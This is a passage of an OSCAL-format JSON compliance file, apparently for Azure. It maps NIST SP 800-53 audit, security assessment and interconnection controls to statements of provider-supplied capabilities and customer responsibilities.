customer-deployed resources.","provided-uuid":"f0d5952e-264a-41ac-8258-3e596e4909b4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44467c8e-271f-4242-a209-b3b89f262662","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12_smt.c","by-components":[{"uuid":"4953bef6-0b5b-4f54-86f6-c9697edd4797","export":{"provided":[{"uuid":"c47c3af7-2d06-42d8-84ea-558cd94bdb08","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-041"}],"description":"All Azure assets are required to generate audit records and audit record metadata as required. Audit records are captured in Geneva Monitoring, which allows for the record generation and reporting capabilities for the required auditable events. These capabilities also allow for the review of audit logs, should information contained within warrant a review._x000D_ _x000D_"}],"responsibilities":[{"uuid":"27e47ee5-22cf-44b1-8a19-0be67f44a65c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-041"}],"description":"The customer is responsible for generating audit records for the subset of auditable events identified in AU-02.d and content defined in AU-03 for customer-deployed resources.","provided-uuid":"c47c3af7-2d06-42d8-84ea-558cd94bdb08"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5af6c3bb-1e56-4ed3-95eb-2d98a213c12d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-12.1","statements":[{"uuid":"f1267fd9-a00a-438f-9eb1-4552df483fb2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12.1_smt","by-components":[{"uuid":"01b6b6eb-ce92-43fe-81bf-d62b9fea66b8","export":{"provided":[{"uuid":"37635c22-3775-4202-9f0e-99beabe01b99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-042"}],"description":"Azure Security correlates audit logs across Azure using time stamps that are precise at least to the millisecond. The audit records are captured in Geneva Monitoring, which allows for the convergence of monitoring data for the required auditable events. To provide a time-correlated audit trail, all Azure logs are time correlated and stored in UTC time format. The time settings allow for a system-wide logical audit trail that is time-correlated to within one millisecond._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7de2206c-26fd-4c52-92fd-74cce8ca301f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-042"}],"description":"The customer is responsible for compiling audit records into a system-wide audit trail for customer-deployed resources.","provided-uuid":"37635c22-3775-4202-9f0e-99beabe01b99"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6f3108e2-9272-4780-8a9b-edb73978234f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-12.3","statements":[{"uuid":"9bb1d600-49a4-431b-b5e2-8c383d7e44eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12.3_smt","by-components":[{"uuid":"2fd4d9c3-64d2-4d12-b9b6-c249636f35b5","export":{"provided":[{"uuid":"700300bb-3bf7-4f58-a19b-b793dd318736","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-043"}],"description":"The Azure Security Logging and Monitoring (SLAM) team and the Security Response Team have developed sets of auditable events for Azure assets based on ongoing risk assessments of the system which incorporate government and industry baselines and requirements, identified vulnerabilities, business requirements, and Azure and C+AI Security Standards. The event sets are reviewed by the SLAM and Security Response Team when a significant change to the system is made to ensure any vulnerabilities exposed are being addressed by the set of auditable events. New events are incorporated when a new asset class is brought online or when a vulnerability or threat is identified through security assessments, security bulletins, and more._x000D_ _x000D_"}],"responsibilities":[{"uuid":"2fe1322d-03fb-42d9-8ecc-adf436cb89e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-043"}],"description":"The customer is responsible for providing the capability to extend or limit auditing on customer-deployed resources as necessary to meet organizational requirements.","provided-uuid":"700300bb-3bf7-4f58-a19b-b793dd318736"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"99dc402e-e151-4998-9030-328fe5d629e9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2","statements":[{"uuid":"60853d2f-bf12-4c63-93cc-8231f3a021e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.a","by-components":[{"uuid":"03f3b69b-bf65-4d71-b0c1-e3cf524e0ced","export":{"provided":[{"uuid":"b46dccba-ca1e-4b68-8868-8629cf1142d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-006"}],"description":"Microsoft utilizes the Third Party Assessment Organization (3PAO) to conduct assessment against Azure clouds."}],"responsibilities":[{"uuid":"07dd07f3-0fa4-4ee2-b8d0-f2c9b5fed6c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-006"}],"description":"The customer is responsible for selecting the appropriate assessor or assessment team for the type of assessment to be conducted on customer-deployed resources.","provided-uuid":"b46dccba-ca1e-4b68-8868-8629cf1142d7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d5142e0b-8db3-454c-983e-7962eeb1a098","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.b","by-components":[{"uuid":"2a2fdeae-472f-4972-86f9-0a88371856fe","export":{"provided":[{"uuid":"608a8fbd-e779-492e-be93-30d6390fb0f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-007"}],"description":"Microsoft utilizes the Third Party Assessment Organization (3PAO) to develop a Security Assessment Plan (SAP) as part of the assessment performed for the Azure offering. The SAP addresses the following objectives: * Scope of the assessment * Assessment approach and methodology * Assessment environment * Known constraints, assumptions and dependencies that may impact the assessment effort * Required resources for performing the assessment * Assessment schedule * Guidelines for evaluating and reporting the assessment findings * Security controls and control enhancements under assessment * Assessment procedures to be used to determine security control effectiveness The SAP is then reviewed and approved by Azure followed by a security assessment performed by the independent assessor. The SAP is based on NIST Special Publication 800-53A Revision 5."}],"responsibilities":[{"uuid":"0ec4f59d-b6dd-4797-bad2-82a8a01c59f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-007"}],"description":"The customer is responsible for developing a security assessment plan for the customer-deployed system. The assessment plan should address the scope of the assessment, including: controls and enhancements; assessment procedures; and the assessment environment, team, and roles/responsibilities.","provided-uuid":"608a8fbd-e779-492e-be93-30d6390fb0f4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"42137132-0e87-41d7-afa6-4e0507b95d8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.c","by-components":[{"uuid":"38b5eab9-9562-4aad-ade9-c4fa725e674b","export":{"provided":[{"uuid":"c96066d7-70c4-4600-858e-ab9b48ce9d44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-008"}],"description":"The SAP approved by Azure and Third Party Assessment Organization (3PAO) is reviewed and approved by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required as necessary as a part of the security authorization package for an authorization decision."}],"responsibilities":[{"uuid":"9b9430e5-7a06-4895-9604-376b4081de1b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-008"}],"description":"The customer is responsible for ensuring the control assessment plan is reviewed and approved by the authorizing official or designated representative prior to conducting the assessment for customer-deployed resources.","provided-uuid":"c96066d7-70c4-4600-858e-ab9b48ce9d44"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2cf43e52-f8d4-4152-af20-4f39b4dd5d7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.d","by-components":[{"uuid":"f4afb723-dc83-4eb1-ad5e-29454227bcc5","export":{"provided":[{"uuid":"7779971f-bd2b-4a79-833d-43f298d16b66","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-009"}],"description":"The assessment utilizes the SAP and the SSP as supporting documents to complete the security assessment and authorization activities in accordance with NIST Special Publication 800-37 Revision 2, which is used to serve as the basis for conducting security assessment and authorization activities for Azure. Azure conducts assessments at least on an annual basis. The assessment procedures are documented in NIST Special Publication 800-53A Revision 5, which also provides the assessment scope and frequency in combination with guidance from regulators. Assessment activities occur on an annual basis against the agreed-upon SAP between Microsoft, the Third Party Assessment Organization (3PAO), and authorizing officials."}],"responsibilities":[{"uuid":"bc2f9cc8-cd88-47ce-a9bf-28f41833fcaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-009"}],"description":"The customer is responsible for assessing the security controls defined in CA-02 on customer-deployed resources.","provided-uuid":"7779971f-bd2b-4a79-833d-43f298d16b66"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7e0ebb4d-6305-40b3-b211-d3585ae5dddf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.e","by-components":[{"uuid":"3bd33e59-2182-409e-8000-feb5738451e0","export":{"provided":[{"uuid":"6db424df-ad41-4788-af37-3d711a391675","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-010"}],"description":"Upon completion of the security assessment, a Security Assessment Report (SAR) is developed by the Third Party Assessment Organization (3PAO) to document the results of security assessment and the risks associated with the system. The SAR documents the results of the assessment, including security controls that are considered other than satisfied, security control weaknesses, recommended remediation steps, and the risks associated with the system. Azure and, if necessary, the 3PAO provide the SAR to the necessary authorizing officials including the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required as necessary as a part of the security authorization package for an authorization decision."}],"responsibilities":[{"uuid":"bb634f60-5ab0-4eb8-8ff8-52732a6bbcc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-010"}],"description":"The customer is responsible for producing a security assessment report. The customer is also responsible for delivering the security assessment results to the required individuals/roles.","provided-uuid":"6db424df-ad41-4788-af37-3d711a391675"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c48d2975-cbe4-4464-9ad2-fdb7cb698709","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.f","by-components":[{"uuid":"400e19c1-ce8e-4004-94b4-76b05f2b3fd0","export":{"provided":[{"uuid":"e4b71871-6bf3-4fcb-b572-a8d08072ece1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-011"}],"description":"The assessment utilizes the SAP and the SSP as supporting documents to complete the security assessment and authorization activities in accordance with NIST Special Publication 800-37 Revision 2, which is used to serve as the basis for conducting security assessment and authorization activities for Azure. Azure conducts assessments at least on an annual basis. The assessment procedures are documented in NIST Special Publication 800-53A Revision 5, which also provides the assessment scope and frequency in combination with guidance from regulators. Assessment activities occur on an annual basis against the agreed-upon SAP between Microsoft, the Third Party Assessment Organization (3PAO), and authorizing officials. Azure and, if necessary, the 3PAO provide the SAR to the necessary authorizing officials including the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required as necessary as a part of the security authorization package for an authorization decision."}],"responsibilities":[{"uuid":"14916de9-7fc3-4e15-8fe3-cf32f59c22b9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-011"}],"description":"The customer is responsible for providing the results of control assessment to defined individuals or roles supporting customer-deployed resources.","provided-uuid":"e4b71871-6bf3-4fcb-b572-a8d08072ece1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"275a1af3-49c7-425d-ae8f-5e9735b3a966","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2.1","statements":[{"uuid":"23ecfb98-4710-4ac5-9816-cb82f10cb876","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2.1_smt","by-components":[{"uuid":"87942d53-7637-4054-873a-a211f5e36714","export":{"provided":[{"uuid":"8fef5ef0-4cff-49cc-ae0d-f8c78e633d18","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-012"}],"description":"Azure employs an approved Third Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with requirements. The results of this assessment and related activities are submitted to Azure's authorizing officials._x000D_ _x000D_"}],"responsibilities":[{"uuid":"890ec3be-a3ed-465a-994e-9f46cf0330bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-012"}],"description":"The customer is responsible for employing independent assessors or assessment teams to conduct security control assessments.","provided-uuid":"8fef5ef0-4cff-49cc-ae0d-f8c78e633d18"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dd0cdb76-3265-47d6-8c02-599539d44159","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2.2","statements":[{"uuid":"c8929460-3cdc-442d-88a5-2951db03e205","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2.2_smt","by-components":[{"uuid":"1e08f93a-b6ae-41d7-8464-f32826aa2d61","export":{"provided":[{"uuid":"faee6d7b-1b67-444a-9483-38d49e07ec7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-013"}],"description":"The Third Party Assessment Organization (3PAO) assesses at least one third of all controls each year in accordance with continuous monitoring requirements, ensuring that all controls are assessed at least every three years. Other criteria, such as significant changes to the system or changes in risk posture and vulnerabilities, may trigger assessments._x000D_ _x000D_ The Third Party Assessment Organization (3PAO) performs penetration testing at least annually. The Penetration Test Report covers Azure system components identified as part of the authorization boundary. Additionally, in-depth monitoring is performed by the Security Response Team on a continuous basis as a part of incident management. The Third Party Assessment Organization (3PAO) also performs an independent validation of all vulnerability scanning conducted by Azure._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5fa6499f-c2df-4a81-ac7d-91d794793c11","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-013"}],"description":"The customer is responsible for the selection of additional testing to be included as part of security control assessments.","provided-uuid":"faee6d7b-1b67-444a-9483-38d49e07ec7d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8a11ac6f-fd16-41ef-b6c0-b853d97cab5e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2.3","statements":[{"uuid":"f1e83136-f573-426c-8b6f-1e344931be61","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2.3_smt","by-components":[{"uuid":"e2366c44-23b2-49ca-b507-2b248cff0e38","export":{"provided":[{"uuid":"953e8c22-39c3-4509-8033-a909aca3caae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-014"}],"description":"Microsoft utilizes the Third Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure and its components against the requirements of NIST SP 800-53, Rev. 4, Security and Privacy Controls for Federal Information Systems and Organizations. Azure accepts the results of the assessment from the 3PAO when the assessment meets the conditions of the Provisional ATO. The results of the assessment are documented in the SAR and submitted for authorizing official approval._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5c3106a8-1884-487c-b2d9-804ef0a3182f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-014"}],"description":"The customer is responsible for accepting assessment results for customer-deployed resources.","provided-uuid":"953e8c22-39c3-4509-8033-a909aca3caae"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a35165aa-14ef-41e6-9049-2ba312e1f02b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-3","statements":[{"uuid":"ee6486f4-2365-4dcf-abce-5093f6314134","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3_smt.a","by-components":[{"uuid":"623df6a3-5ee2-4aa5-955b-dcfb1854c229","export":{"provided":[{"uuid":"9a3a8f5d-e87a-480f-a04b-d6a6e0adf8f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-015"}],"description":"Microsoft authorizes connections from the information system to other information systems outside of the authorization boundary through the use of vendor agreements, Memoranda of Understanding (MOUs), Interconnection Security Agreements (ISAs), Terms of Conditions (T&C), and/or Service Level Agreements (SLAs). Microsoft has developed the necessary vendor agreements, MOUs, ISAs, T&C, and SLAs that document connections outside of the Federal authorization boundary. Microsoft follows guidance regarding government agencies in that Interconnection Security Agreements (ISAs) are not designed for use between a CSP and Federal Agency. An Agency ATO memo should be the governing document for Agency and Azure interaction and security requirement communications. The only interconnections are between internal Microsoft services, which do not require ISAs.The internal Microsoft services that connect with Azure cloud are CorpNet and Cosmos. CorpNet is the Microsoft corporate network. CorpNet contains services run on Microsoft's corporate network, not dedicated to Azure, such as source code repositories, system document repositories, and change ticketing. Cosmos is a service, not dedicated to Azure, that stores and reports on Azure log data. Microsoft Entra ID (formerly AAD) scrubs logs of customer information before sending logs to Cosmos. At this time, Azure does not have any dependencies on information systems external to Microsoft that require ISAs."}],"responsibilities":[{"uuid":"e714b558-46ac-4c11-821c-10e6b1986e4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-015"}],"description":"The customer is responsible for authorizing connections from the customer-deployed system to external systems using Interconnection Security Assessments.","provided-uuid":"9a3a8f5d-e87a-480f-a04b-d6a6e0adf8f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a27101c6-3d87-4458-a6ef-d5d3b2e2d4d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3_smt.b","by-components":[{"uuid":"f78c7a7c-cdd1-4905-b5d4-0ccc59bccd51","export":{"provided":[{"uuid":"a75bd2b4-bf28-470a-9887-8bc887ab5a30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-016"}],"description":"Azure Security is responsible for developing and maintaining MOU/ISA/T&C/SLA documents for Azure. These documents include the interface characteristics, security requirements and the nature of the information being communicated with third parties. Azure documents in its MOU/ISA and T&C agreements with Microsoft services the interface characteristics, security requirements, information communicated, service requests, and service level agreements. These MOU/ISA and T&C documents serve as records between the Microsoft organizations of the commitments that were agreed to. Each document is signed by executive level Microsoft personnel who have responsibility over the systems interconnection."}],"responsibilities":[{"uuid":"6a035758-b6d1-4b62-b9fa-648e3da44e45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-016"}],"description":"The customer is responsible for documenting the details of each interconnection defined in CA-03.a.","provided-uuid":"a75bd2b4-bf28-470a-9887-8bc887ab5a30"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8e2cb037-b380-4446-b2a1-ffab940c3424","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3_smt.c","by-components":[{"uuid":"af5b01df-0b1c-4513-a194-f9d980d39b86","export":{"provided":[{"uuid":"58520b68-18c6-468a-9768-f88f805f56a8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-017"}],"description":"Microsoft monitors its Interconnection Security Agreements (ISAs) to verify security requirements. Microsoft conducts annual meetings with third parties to review agreements and any changes, and ensures that connection data described in ISAs is logged and monitored as part of the continuous monitoring process. Microsoft also reviews ISAs as needed, based on input from authorizing officials, and updates them when necessary."}],"responsibilities":[{"uuid":"8a6e0025-9ea9-4365-b30f-db39e40f1d0f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-017"}],"description":"The customer is responsible for reviewing and updating Interconnection Security Agreements.","provided-uuid":"58520b68-18c6-468a-9768-f88f805f56a8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3e5e5efb-5872-4ba9-9a2a-68db4c69d655","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-3.6","statements":[{"uuid":"d1ae135a-8be2-4408-9263-1fc9a92c729e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3.6_smt","by-components":[{"uuid":"53009386-9e16-41cc-9882-2348c505b56e","export":{"provided":[{"uuid":"54569efd-946e-4a3d-962a-5f16e40e8b04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-018"}],"description":"The customer is responsible for verifying individuals or systems transferring data between interconnecting systems have the requisite authorizations prior to accepting such data on customer-deployed resources. Azure does not have any connections to external information systems. The only interconnections are with internal Microsoft services. Azure authorizes connections from the information system to other information systems outside of the authorization boundary using vendor agreements, Memoranda of Understanding (MOUs), Interconnection Security Agreements (ISAs), Terms of Conditions (T&C), and/or Service Level Agreements (SLAs). Microsoft has developed the necessary vendor agreements, MOUs, ISAs, T&C, and SLAs that document connections outside of the Federal authorization boundary. Azure follows guidance regarding government agencies in that Interconnection Security Agreements (ISAs) are not designed for use between a CSP and Federal Agency. An Agency ATO memo should be the governing document for Agency and Azure interaction and security requirement communications. The only interconnections are between internal Microsoft services, which do not require ISAs. Personnel supporting internal Microsoft services are subject to background screening requirements during the Microsoft hiring process. Microsoft hiring managers work with Microsoft HR to ensure personnel are cleared through background screening before they are granted access to Microsoft systems. As such, personnel are authorized through the background screening processes validated by Microsoft hiring managers and Microsoft HR. Refer to control PS-03 for more details around background screening process."}],"responsibilities":[{"uuid":"3a0f1311-c6bc-4c77-94fa-297162481ae8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-018"}],"description":"The customer is responsible for verifying individuals or systems transferring data between interconnecting systems have the requisite authorizations prior to accepting such data on customer-deployed resources.","provided-uuid":"54569efd-946e-4a3d-962a-5f16e40e8b04"}]},"description":"See inheritance and customer responsibility 